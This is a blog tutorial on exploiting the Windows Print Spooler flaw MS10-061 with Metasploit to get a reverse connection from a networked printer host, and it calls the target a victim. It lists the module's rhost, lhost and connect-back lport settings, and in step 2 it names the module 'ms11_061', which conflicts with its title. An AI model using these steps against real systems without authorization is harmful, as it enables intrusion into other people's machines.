Được tạo bởi Blogger.
Home » » Hacking Windows via MS10-061 Print Spooler Service Impersonation using Metasploit + Backtrack 5

Hacking Windows via MS10-061 Print Spooler Service Impersonation using Metasploit + Backtrack 5

Written By Tuan.Dao.Duy on Thứ Sáu, 6 tháng 12, 2013 | 22:01

Have you ever seen someone sharing their printer inside a network?? When you're working in an office maybe you will see this everyday, a printer connected to a computer and that computer act as a print server. But this vulnerability didn't discuss about print server, but the service behind printer sharing in Windows. In this tutorial we will try to hack windows via Windows printer sharing service.
This is the definition about this exploit according to metasploit website :
This module exploits the RPC service impersonation vulnerability detailed in Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service to create a file. The working directory at the time is %SystemRoot%\system32. An attacker can specify any file name, including directory traversal or full paths. By sending WritePrinter requests, an attacker can fully control the content of the created file. In order to gain code execution, this module writes to a directory used by Windows Management Instrumentation (WMI) to deploy applications. This directory (Wbem\Mof) is periodically scanned and any new .mof files are processed automatically. This is the same technique employed by the Stuxnet code found in the wild.
Maybe you'll become impatient if I write too much about the intro :-P so…let's start the tutorial

Requirement :

1. Metasploit framework

Step by Step :

1. The first step you need to explore your network locations and find printer sharing devices there. Below was my picture when I found one active printer sharing in my network.
Hacking Windows via MS10-061 Print Spooler Service Impersonation using Metasploit + Backtrack 5
2. Yep we've got 1 victim there and now let's prepare our metasploit console by typing msfconsole command, and then use ms11_061 exploit and set up the payload.
Hacking Windows via MS10-061 Print Spooler Service Impersonation using Metasploit + Backtrack 5
3. To view the available switch, use show options command. The picture below was my switch configuration to perform the attack.
Hacking Windows via MS10-061 Print Spooler Service Impersonation using Metasploit + Backtrack 5
Information :
set pname canon --> set up the printer name (see step 1)

set rhost 192.168.8.94 --> IP address that host the printer sharing

set lhost 192.168.8.92 --> attacker local address
(use ifconfig to view your IP)


set lport 443 --> connect back port from victim to our computer
4. Okay, until this step everything we've been set up so nice and ready to attack the victim. Let's run the exploit command to perform the attack and see we can pwned it or not.
Hacking Windows via MS10-061 Print Spooler Service Impersonation using Metasploit + Backtrack 5
5. Yep everything was running so pretty, and then for the last result after waiting for the session:
Hacking Windows via MS10-061 Print Spooler Service Impersonation using Metasploit + Backtrack 5
We owned the machine :-P
Share this article :

0 nhận xét:

Đăng nhận xét

 
Đăng Kí Học Trực Tuyến : Chương Trình Đào Tạo Security365 | Ethical Haking | SiSSP
Copyright © 2013. Công nghệ thông tin 365!! - All Rights Reserved
Web Master @ Nguyen Tran
Tech Support @ Bang Tran Ngoc